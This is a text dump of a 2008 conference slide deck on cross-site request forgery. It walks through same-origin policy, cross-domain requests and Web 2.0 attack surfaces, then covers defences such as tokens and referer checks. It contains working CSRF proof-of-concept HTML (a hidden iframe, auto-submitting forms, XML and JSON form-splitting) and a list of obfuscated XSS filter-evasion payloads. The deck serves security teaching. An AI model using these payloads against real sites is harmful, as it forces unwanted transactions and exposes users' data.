[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

Session J7 Demo
CSRF: The Biggest Little
Vulnerability on the Web

Who Am I? http://shreeraj.blogspot.com
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com

Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
Past experience
– Net Square, Chase, IBM & Foundstone
Interest
– Web security research
Published research
– Articles / Papers – Securityfocus, O’erilly, DevX,
InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap,
AppCodeScan, AppPrint etc.
– Advisories - .Net, Java servers etc.
Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking

© Blueinfy Solutions Pvt. Ltd.

Both real and possible

It all can happen while you are
browsing without your consent
– Bank account transfer
– Buy call for stocks
– Password changes on your email
account
– Placing an order on your online
auction site
– ….more….


Myth…

We have authentication in place
We do proper session
management
We are over SSL and entertain
just POST requests
We use secure browser


How?

All popular browsers can
make Cross Domain Calls
Browsers do replay cookies to
same domain
Browser manages
authentications as well

CSRF

Demo

Quick look at the case of
Stock trading portal
Adding stocks to portfolio ☺


Agenda
State of Application Security and Role of
CSRF
CSRF Introduction and Cross Domain Calls
CSRF attack
CSRF and Web 2.0
Defense against CSRF
Conclusion

We will have concepts, examples and demos


Application Security State
CSRF on the rise


Hacks & Attacks


Attack vectors and types

Source: Web Application Security Consortium (WASC)

Trends…

Server side hacking is getting
tougher with central defense
Attacks on client side – XSS and
CSRF
Helps in identity stealing
Both exploits and framework are
available


CSRF – “Sleeping giant”

“Sleeping giant is still a giant”
Entered into OWASP top 10 and Mitre
Corp.'s Common Vulnerability and
Exposures (CVE) list
XSS and CSRF can be twin evils
Having XSS one gets CSRF free any
way
CSRF defense is difficult


Real Cases and Attacks


Web 2.0 – Adding fuel to the fire
80% of companies are investing
in Web Services as part of their
Web 2.0 initiative (McKinsey 2007
Global Survey)
By the end of 2007, 30 percent of
large companies have some kind
of Web 2.0-based business
initiative up and running.
(Gartner)
2008. Web Services or Service-
Oriented Architecture (SOA)
would surge ahead. (Gartner)

Root cause of Vulnerabilities
CSRF is somewhere
in-between CSI Security Survey : Vulnerability Distribution
Protocol?
Browser?
misconfiguration,
Programming? other problems
36%

programming
errors
64%

misconfiguration, other problems programming errors


CSRF – Basics


CSRF

Cross Site Request Forgery
(CSRF) also known as XSRF
Several other names to same
vector like – “sea surf”,
session ridding, One click
attack etc…
Results are same


CSRF scenario

Login request Web app

Web app
DB
Web Web
Client Web app
Authenticated Server
SESSID=190832mkidw
DB
Session id given Web app

Banking
Application


CSRF scenario

Transaction page Web app

Web app
DB
Web Web
Client Web app
Transaction done Server DB
SESSID=190832mkidw
On session id Web app

Banking
Application


CSRF scenario
Malicious
Site
Browse
Load a
Web app
page
Web app
DB
Web Web
Client Web app
Server
SESSID=190832mkidw
DB
Web app

Banking
Application


CSRF scenario
Malicious
Site
Browse
Load a page
Web app

Forced Web app
DB
Web Web
Client Transaction page Web app
Server
DB
SESSID=190832mkidw
Transaction done Web app
on session id
Banking
Application


Cross Domain Call

Why? – Cross Domain Calls
work
What about Same Origin
Policy (SOP)?
Is it a bypass to it? – For
CSRF success.


Cross Domain Access
and
Same Origin Policy (SOP)


Cross Domain
Browser & Cross domain access
– an issue
How to access cross domain
information from the browser?
Browsers are following same
origin policy.
This policy protect browser from
security and privacy access
Ajax and RIA brought this issue
on front end
It is important for them to access
cross domain resources.

Same Origin Policy

Same origin policy is followed by
all browsers
The policy dates from Netscape
Navigator 2.0.
Two pages to have the same
origin if the protocol, port (if
given), and host are the same for
both pages.
document.domain – DOM
reference point


Example

http://example.com/dir1/foo.asp
http://example.com/dir2/me.asp
[Success]
https://example.com/cool.asp [Fail-
protocol]
http://example.com:8080/foo.asp [Fail-
port]
http://apple.com/ [Fail-host]
Origin check is there by comparing with
document.domain – Part of DOM


Should not work

trade.example.com
Login (user/pass)

Trading
Site
Client Authentication Cookie
Trading Page

X News
Site

cnn.com


Request generation

IMG SRC
<img src=quot;http://host/?commandquot;>

SCRIPT SRC
<script src=quot;http://host/?commandquot;>

IFRAME SRC
<iframe src=quot;http://host/?commandquot;>


Request generation

'Image' Object
<script>
var foo = new Image();
foo.src =
quot;http://host/?commandquot;;
</script>


Request generation

It is possible to generate POST as
well
Form can be build dynamically
and button click from JavaScript is
possible
<script type=quot;text/javascriptquot;
language=quot;JavaScriptquot;>
document.foo.submit();
</script>


CSRF Attack


Attacking with CSRF


Logging in
POST /trade/login.aspx HTTP/1.1 HTTP/1.x 200 OK
Host: trade.example.com Date: Mon, 23 Jul 2007 04:10:29 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 Server: Microsoft-IIS/6.0
Accept: X-Powered-By: ASP.NET
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex X-AspNet-Version: 2.0.50727
t/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5 Set-Cookie:
Accept-Encoding: gzip,deflate ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1;
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 path=/;
Keep-Alive: 300 Cache-Control: private
Connection: keep-alive
Content-Type: text/html; charset=utf-8
Referer: http://trade.example.com/trade/login.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
user=rob&pass=iamrob&Submit=Submit


Placing an order

GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5)
Gecko/20070713 Firefox/2.0.0.5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.
8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: http://trade.example.com/trade/trade.html
Cookie: ASP.NET_SessionId= mvoik245bzlfom55dxjsxoe1


Victim on another site

<html>
<head></head>
<body>
Welcome to our auction portal. We have some great products for which you can bid. <br>
Enjoy!
<iframe src='http://trade.example.com/trade/buy.aspx?symbol=GOOG&units=50‘
id='xsfr' name='CSRF' style=quot;width:0px; height:0px; border: 0pxquot;>
</body>
</html> GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Referer: http://CSRF.example.com/trade/CSRF.html
Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245


Victim with POST request
<FORM NAME=quot;buyquot; action=quot;./buy.aspxquot;
METHOD=quot;GETquot;>
<input type=quot;hiddenquot; name=quot;symbolquot;
value=quot;GOOGquot;>
<input type=quot;hiddenquot; name=quot;unitsquot; value=quot;50quot;>
</FORM>
<script>document.buy.submit();</script>
POST /trade/buy.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6)
Gecko/20070725 Firefox/2.0.0.6
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0
.8,image/png,*/*;q=0.5
Keep-Alive: 300
Referer: http://CSRF.example.com/trade/buy.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
symbol=GOOG&units=50


Obfuscation to bypass controls
';alert(String.fromCharCode(8
8,83,83))//';alert(String.fromC
harCode(88,83,83))//quot;;alert(St
ring.fromCharCode(88,83,83)
)//quot;;alert(String.fromCharCod
e(88,83,83))//--
></SCRIPT>quot;>'><SCRIPT>al
ert(String.fromCharCode(88,8
3,83))</SCRIPT>



<SCRIPT
SRC=http://url/xss.js></SCRIPT>
<IMG SRC=quot;javascript:alert('XSS');quot;>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG
SRC=javascript:alert("XSS")
>
<IMG SRC=`javascript:alert(quot;XSSquot;)`>
Image tag malformed - <IMG
quot;quot;quot;><SCRIPT>alert(quot;XSSquot;)</SCRIPT>quot;
>


<IMG
SRC=javascript:alert(String.fromCharC
ode(88,83,83))>
Unicode encoding - <IMG
SRC=javas
cript&#58
;alert&#4
0;'XSS')>



UTF-8 - <IMG
SRC=&#0000106&#0000097&#000011
8&#0000097&#0000115&#0000099&#0
000114&#0000105&#0000112&#00001
16&#0000058&#0000097&#0000108&#
0000101&#0000114&#0000116&#0000
040&#0000039&#0000088&#0000083&
#0000083&#0000039&#0000041>



Hex - <IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&
#x63&#x72&#x69&#x70&#x74&#x3A&#
x61&#x6C&#x65&#x72&#x74&#x28&#x
27&#x58&#x53&#x53&#x27&#x29>
XSS breakup - <IMG SRC=quot;jav
ascript:alert('XSS');quot;>
<IMG
SRC=quot;jav	ascript:alert('XSS');quot;>


CSRF and Web 2.0


Web 2.0 and CSRF

Web 2.0 applications can be
vulnerable to different type of
CSRF
It can be with different
structures
One needs to look at it as well


Architecture


Architecture - Layers

Browser Structures Protocols Server-Side

JSON-RPC
Ajax Flash / RIA Services
XML REST
HTML/CSS JavaScript SaaS
JSON XML-RPC
Widget DOM Open APIs
SOAP

HTTP(S)


Web 2.0 Changes
Application Infrastructure

Vector Web 1.0 Web 2.0
Protocols HTTP & HTTPS SOAP, XML-RPC, REST etc.
over
HTTP & HTTPS
Information HTML transfer XML, JSON, JS Objects etc.
structures
Communication Synchronous Asynchronous & Cross
methods Postback domains
Refresh and Redirect (proxy)
Information sharing Single place Multiple sources (Urge for
information (No integrated
urge for integration) information platform)


Ajax/RIA call

Asynchronous JavaScript and
XML
HTML / CSS / Flash Database / Resource

JS / DOM XML / Middleware / Text

XMLHttpRequest (XHR) Web Server

Asynchronous
over HTTP(S)


Web 2.0 Structures
&
Cross Domain Calls


Application Structures

Ajax running with various different
structures
Developers are adding various different
calls and methods for it
JavaScript can talk with back end
sources
Mashups application talking with
various sources
It has significant security impact.
JSON, Array, JS-Object etc
Identifying and Discovery of structures
and CSRF

CSRF with various streams
JSON

XML JS-Script

JS-Object
JS-Array


Addressing Cross Domain Calls –
CSRF opening
Cross Domain calls are very
important for Web 2.0
applications.
– Proxy to talk with cross domain
– Callback implementation to fetch
them
– Flash via crossdomain.xml
These are types of bypass and
can have security implications
Source of the information – key!


Cross Domain with proxy


Callback Implementation

• Portals like yahoo and google are supporting this.
• Possible to bypass the SOP and make Cross Domain Calls
• Security at stake [Browser layer]


CSRF for 2.0


Cross Site Request Forgery (CSRF)

What is different with Web 2.0
– Is it possible to do CSRF to XML
stream
– How?
– It will be POST hitting the XML
processing resources like Web
Services
– JSON CSRF is also possible
– Interesting check to make against
application and Web 2.0 resources


One Way CSRF Scenario


One-Way CSRF


One-Way CSRF
<html>
<body>
<FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot;
action=quot;http://trade.example.com/xmlrpc/trade.r
emquot; METHOD=quot;POSTquot;>
<input type=quot;hiddenquot; name='<?xml version'
value='quot;1.0quot;?><methodCall><methodName>sto
cks.buy</methodName><params><param><val
ue><string>MSFT</string></value></param><p
aram><value><double>26</double></value></
param></params></methodCall>'>
</FORM>
</body>
</html>


Forcing XML

Splitting XML stream in the
form.
Possible through XForms as
well.
Similar techniques is
applicable to JSON as well.


Similar with JSON
{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;nonequot;}

<FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot;
action=quot;http://trade.example.com/trade/ajax-buy/buy.aspxquot; METHOD=quot;POSTquot;>
<input type=quot;hiddenquot; name='{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;' value='noquot;}'>
</FORM>

POST /trade/ajax-buy/buy.aspx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Referer: http://trade.example.com/trade/json-buy/json-CSRF.html
Content-Type: text/plain
Content-Length: 53
{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;=noquot;}


Two-Way CSRF

One-Way – Just making forceful
request.
Two-Way
– Reading the data coming from the
target
– May be getting hold onto
important information – profile,
statements, numbers etc.
– Is it possible with JSON/XML


Two-Way CSRF


Two-Way CSRF

Application is serving various
streams like – JSON, JS-
Object, Array etc.


Two-Way CSRF

Attacker page can make
cross domain request using
SCRIPT (firefox)
Following code can overload
the array stream.
function Array()
{ var obj = this; var index = 0;
for(j=0;j<4;j++){ obj[index++] setter =
spoof; } } function spoof(x){
send(x.toString()); }

Two-Way CSRF

It is possible to overload
these objects.
Reading and sending to cross
domain possible.
Opens up two way channel
for an attacker.
Web 2.0 streams are
vulnerable to these attacks.

Scenario
JSON Vulnerable stream coming
Blog feed through proxy

Posting to the site
[Malicious code] proxy

Web app
DB
attacker Web
Server Web app

JSON
Web
Client
CSRF Target


Web 2.0 Components

There are various other
components for Web 2.0
Applications – Can serve as
CSRF payload
– RSS feeds
– Mashups
– Widgets
– Blogs
– Flash based components

RSS feeds

RSS feeds coming into
application from various un-
trusted sources.
Feed readers are part of 2.0
Applications.
Vulnerable to XSS or CSRF.
Malicious code can be
executed on the browser.
Several vulnerabilities
reported. © Blueinfy Solutions Pvt. Ltd.

RSS feeds


Mashups

API exposure for Mashup supplier
application.
Cross Domain access by callback
may cause CSRF.
Mashup application can be man in
the middle so can’t trust or must
be trusted one.


Widgets/Gadgets

DOM sharing model can
cause many security issues.
One widget can change
information on another widget
– possible.
CSRF injection through
widget code.


Blogs

Blogs are common to Web
2.0 applications.
Many applications are
plugging third party blogs
One needs to check these
blogs – CSRF is common
with blogging applications.


Defense against CSRF


Unique tokens

URL tokens – dynamically generated
Form tokens – hidden

<input type=quot;submitquot; class=quot;submitquot; value=quot;Loginquot; /> <input type=quot;hiddenquot;

name=quot;formTokenquot; value=quot;d5cb8550af604bfb103dae89445fde69quot;>


Captchas

Can have image/text based
captchas for important forms
This will add protection
against CSRFs
Banking and financial
applications can add several
transaction ids for users


Referer check

Checking referrer to identify
from where requests are
coming
Same domain or request from
specific resource should be
entertained
Referer: http://www.google.com/


Session and Logout

Client side – self defense
– Logout after activities at earliest
– Doing banking and other critical
operations from separate browser
– Browsing from VM
On server side session duration
should be small


Web 2.0 Specific
Server Side Checks
– Check for client’s content-type.
– XHR calls – xml/application.
– Native calls – text/html.
– Filtering is possible on it.
Client Side Checks
– Stream can be started and
terminated by /* or any predefined
characters.
– Client can remove them before
injecting to DOM.

Warning

Discussed countermeasures are
not bullet proof but raise the bar
There is no perfect security for
CSRF – browsers are designed
and work that allows CSR
XSS on the site gives a leverage
for CSRF - No XSS!


Conclusion

CSRF is indeed a sleeping giant
Understanding is important and
need to put countermeasures at
code level
No full proof defense available but
there are ways to protect
applications or part of applications
Web 2.0 – adds new dimension to
CSRF



Questions


[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

Recommended

More Related Content

What's hot

What's hot(20)

Viewers also liked

Viewers also liked(13)

Similar to [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

Similar to [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web (20)

More from Shreeraj Shah

More from Shreeraj Shah(9)

Recently uploaded

Recently uploaded(20)

[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web